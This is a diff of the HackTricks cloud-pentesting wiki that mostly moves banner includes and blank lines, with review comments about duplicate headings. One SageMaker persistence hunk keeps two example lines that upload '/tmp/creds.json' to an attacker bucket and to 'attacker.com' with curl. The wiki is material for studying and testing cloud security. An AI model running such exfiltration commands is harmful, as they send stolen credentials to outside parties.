mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2025-12-28 21:53:15 -08:00
Add content from: AnsibleHound – BloodHound Collector for Ansible WorX and Tow...
@@ -1,5 +1,5 @@
|
||||
# AWS - Persistence
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
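Review bot: The only lines visible in this hunk are the `# AWS - Persistence` title and the banner include with blank lines around them, and the line counts are unchanged (1,5 to 1,5), so this reads as a whitespace-only edit in a file with no connection to the commit subject (AnsibleHound). The same applies to the other 1,5/1,5 hunks on the section index pages further down. Suggest moving these banner and blank-line normalisations into a separate commit so the content change can be reviewed on its own.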
@@ -1,3 +1,6 @@
|
||||
# Aws Sagemaker Persistence
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
# AWS - SageMaker Lifecycle Configuration Persistence
|
||||
|
||||
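Review bot: The top of this file now carries two level-1 headings, `# Aws Sagemaker Persistence` followed by `# AWS - SageMaker Lifecycle Configuration Persistence`, and the first is cased differently ("Aws Sagemaker") from the second and from the sibling pages ("AWS - ..."). Suggest keeping a single H1, or demoting the second to `##`, and writing the title in the same style as the other pages, for example `# AWS - SageMaker Persistence`.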
@@ -157,3 +160,4 @@ aws s3 cp /tmp/creds.json $ATTACKER_BUCKET/$(hostname)-creds.json
|
||||
|
||||
curl -X POST -F "file=@/tmp/creds.json" http://attacker.com/upload
|
||||
```
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
# AWS - Post Exploitation
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
@@ -35,3 +35,4 @@ However, a **bypass** has been identified where an attacker with sufficient perm
|
||||
**Summary:**
|
||||
|
||||
This vulnerability allows an attacker with sufficient AWS IAM permissions to recover previously detected secrets even after the original file has been deleted from S3. If an AWS secret key, access token, or other sensitive credential is exposed, an attacker could leverage this flaw to retrieve it and gain unauthorized access to AWS resources. This could lead to privilege escalation, unauthorized data access, or further compromise of cloud assets, resulting in data breaches and service disruptions.
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,8 +1,10 @@
|
||||
# AWS - Sagemaker Privesc
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## AWS - Sagemaker Privesc
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl`
|
||||
|
||||
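Review bot: In the first ten lines of this file the banner `{{#include ../../../banners/hacktricks-training.md}}` is included twice, once after `# AWS - Sagemaker Privesc` and again after `## AWS - Sagemaker Privesc`, and the title itself is repeated at two heading levels. Suggest keeping one title and one top banner and dropping the repeated pair. The same pattern shows in the ECR Enum, Inspector Enum, Trusted Advisor Enum, WAF Enum, GCP - Add Custom SSH Metadata, IBM Cloud Pentesting and Kubernetes Basics hunks.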
@@ -114,4 +116,3 @@ _I haven't exploited because of the lack of time, but looks similar to the previ
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# AWS - WorkDocs Privesc
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## WorkDocs
|
||||
|
||||
For more info about WorkDocs check:
|
||||
@@ -54,3 +56,4 @@ I didn't find any way to do this from the cli.
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,8 +1,10 @@
|
||||
# AWS - ECR Enum
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## AWS - ECR Enum
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
### ECR
|
||||
|
||||
@@ -103,4 +105,3 @@ In the following page you can check how to **abuse ECR permissions to escalate p
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
# AWS - Security & Detection Services
|
||||
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
@@ -1,8 +1,10 @@
|
||||
# AWS - Inspector Enum
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
## AWS - Inspector Enum
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
### Inspector
|
||||
|
||||
@@ -387,4 +389,3 @@ aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,8 +1,10 @@
|
||||
# AWS - Trusted Advisor Enum
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
## AWS - Trusted Advisor Enum
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
## AWS Trusted Advisor Overview
|
||||
|
||||
@@ -72,4 +74,3 @@ AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, perform
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,8 +1,10 @@
|
||||
# AWS - WAF Enum
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
## AWS - WAF Enum
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
## AWS WAF
|
||||
|
||||
@@ -472,4 +474,3 @@ aws wafv2 untag-resource --resource-arn <value> --tag-keys <value>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,8 +1,10 @@
|
||||
# AWS - EventBridge Scheduler Enum
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## EventBridge Scheduler
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
## EventBridge Scheduler
|
||||
|
||||
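Review bot: `## EventBridge Scheduler` appears twice in this hunk with only a banner include between the two, which gives duplicate heading anchors and a first section that contains nothing but the banner. Suggest removing the first `## EventBridge Scheduler` and the banner include that follows it, so the page reads title, banner, `## EventBridge Scheduler`.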
@@ -82,4 +84,3 @@ In the following page, you can check how to **abuse eventbridge scheduler permis
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
# Az - Post Exploitation
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
@@ -19,3 +19,4 @@ For more information about function apps check:
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
# Az - Privilege Escalation
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
@@ -1,7 +1,10 @@
|
||||
# Az Static Web Apps
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
# Az - Static Web Apps
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
## Static Web Apps Basic Information
|
||||
|
||||
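Review bot: This hunk leaves two level-1 headings for the same page, `# Az Static Web Apps` and `# Az - Static Web Apps`, each followed by its own banner include. Suggest keeping only `# Az - Static Web Apps`, which matches the naming of the other Az pages in this commit, with a single banner before `## Static Web Apps Basic Information`.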
@@ -202,4 +205,3 @@ All the information about privilege escalation and post exploitation in Azure St
|
||||
- [https://learn.microsoft.com/en-us/azure/app-service/overview-hosting-plans](https://learn.microsoft.com/en-us/azure/app-service/overview-hosting-plans)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# GCP - Permissions for a Pentest
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
If you want to pentest a GCP environment you need to ask for enough permissions to **check all or most of the services** used in **GCP**. Ideally, you should ask the client to create:
|
||||
|
||||
* **Create** a new **project**
|
||||
@@ -144,3 +146,4 @@ roles/bigquery.metadataViewer
|
||||
```
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
# GCP - Persistence
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
# GCP - Post Exploitation
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
@@ -128,3 +128,4 @@ def injection():
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,8 +1,10 @@
|
||||
# GCP - Add Custom SSH Metadata
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
## GCP - Add Custom SSH Metadata
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
### Modifying the metadata <a href="#modifying-the-metadata" id="modifying-the-metadata"></a>
|
||||
|
||||
@@ -100,4 +102,3 @@ It's possible to broaden the reach of SSH access to multiple Virtual Machines (V
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -58,3 +58,4 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
# GCP - Services
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
@@ -1,8 +1,10 @@
|
||||
# IBM Cloud Pentesting
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## IBM Cloud Pentesting
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
### What is IBM cloud? (By chatGPT)
|
||||
|
||||
@@ -38,4 +40,3 @@ https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,8 +1,10 @@
|
||||
# Kubernetes Basics
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## Kubernetes Basics
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
**The original author of this page is** [**Jorge**](https://www.linkedin.com/in/jorge-belmonte-a924b616b/) **(read his original post** [**here**](https://sickrov.github.io)**)**
|
||||
|
||||
@@ -569,4 +571,3 @@ https://www.youtube.com/watch?v=X48VuDVv0do
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# External Secret Operator
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/)
|
||||
|
||||
This page gives some pointers onto how you can achieve to steal secrets from a misconfigured ESO or application which uses ESO to sync its secrets.
|
||||
@@ -119,3 +121,4 @@ https://github.com/external-secrets/external-secrets
|
||||
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# Kubernetes Kyverno
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
|
||||
|
||||
## Definition
|
||||
@@ -57,3 +59,4 @@ When a pod is created in the `default` namespace without the label `app: myapp`,
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# Kubernetes Kyverno bypass
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
|
||||
|
||||
|
||||
@@ -64,3 +66,4 @@ Another way to bypass policies is to focus on the ValidatingWebhookConfiguration
|
||||
|
||||
For more info check [https://madhuakula.com/kubernetes-goat/docs/scenarios/scenario-22/securing-kubernetes-clusters-using-kyverno-policy-engine/welcome/](https://madhuakula.com/kubernetes-goat/docs/scenarios/scenario-22/securing-kubernetes-clusters-using-kyverno-policy-engine/welcome/)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# Kubernetes - OPA Gatekeeper
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
|
||||
|
||||
## Definition
|
||||
@@ -77,3 +79,4 @@ When Gatekeeper is deployed in the Kubernetes cluster, it will enforce this poli
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# Kubernetes OPA Gatekeeper bypass
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
|
||||
|
||||
## Abusing misconfiguration
|
||||
@@ -64,3 +66,4 @@ Another way to bypass constraints is to focus on the ValidatingWebhookConfigurat
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# Kubernetes ValidatingWebhookConfiguration
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
|
||||
|
||||
## Definition
|
||||
@@ -103,3 +105,4 @@ abusing-roles-clusterroles-in-kubernetes/
|
||||
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# OpenShift Pentesting
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## Basic Information
|
||||
|
||||
{{#ref}}
|
||||
@@ -20,3 +22,4 @@ openshift-privilege-escalation/
|
||||
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# OpenShift - Basic information
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## Kubernetes prior b**asic knowledge** <a href="#a94e" id="a94e"></a>
|
||||
|
||||
Before working with OpenShift, ensure you are comfortable with the Kubernetes environment. The entire OpenShift chapter assumes you have prior knowledge of Kubernetes.
|
||||
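Review bot: The heading in this hunk, `## Kubernetes prior b**asic knowledge** <a href="#a94e" id="a94e"></a>`, opens its bold markers mid-word, so "basic" renders partly bold. Since the hunk already touches the top of this file, suggest fixing it in the same pass, for example `## Kubernetes prior basic knowledge`, keeping the anchor tag as it is.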
@@ -41,3 +43,4 @@ https://docs.openshift.com/container-platform/3.11/architecture/additional_conce
|
||||
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# OpenShift - Jenkins
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/)
|
||||
|
||||
This page gives some pointers onto how you can attack a Jenkins instance running in an Openshift (or Kubernetes) cluster
|
||||
@@ -40,3 +42,4 @@ openshift-jenkins-build-overrides.md
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# Jenkins in Openshift - build pod overrides
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/)
|
||||
|
||||
## Kubernetes plugin for Jenkins
|
||||
@@ -275,3 +277,4 @@ pipeline {
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# OpenShift - Privilege Escalation
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## Missing Service Account
|
||||
|
||||
{{#ref}}
|
||||
@@ -20,3 +22,4 @@ openshift-scc-bypass.md
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# OpenShift - Missing Service Account
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## Missing Service Account
|
||||
|
||||
It happens that cluster is deployed with preconfigured template automatically setting Roles, RoleBindings and even SCC to service account that is not yet created. This can lead to privilege escalation in the case where you can create them. In this case, you would be able to get the token of the SA newly created and the role or SCC associated. Same case happens when the missing SA is part of a missing project, in this case if you can create the project and then the SA you get the Roles and SCC associated.
|
||||
@@ -24,3 +26,4 @@ https://github.com/maxDcb/OpenShiftGrapher
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# Openshift - SCC bypass
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
|
||||
|
||||
## Privileged Namespaces
|
||||
@@ -139,3 +141,4 @@ To bypass GateKeeper's rules and set this label to execute a cluster takeover, *
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# OpenShift - Tekton
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Haroun**](https://www.linkedin.com/in/haroun-al-mounayar-571830211)
|
||||
|
||||
### What is tekton
|
||||
@@ -76,3 +78,4 @@ spec:
|
||||
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
# Openshift - SCC
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
|
||||
|
||||
## Definition
|
||||
@@ -69,3 +71,4 @@ openshift-privilege-escalation/openshift-scc-bypass.md
|
||||
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||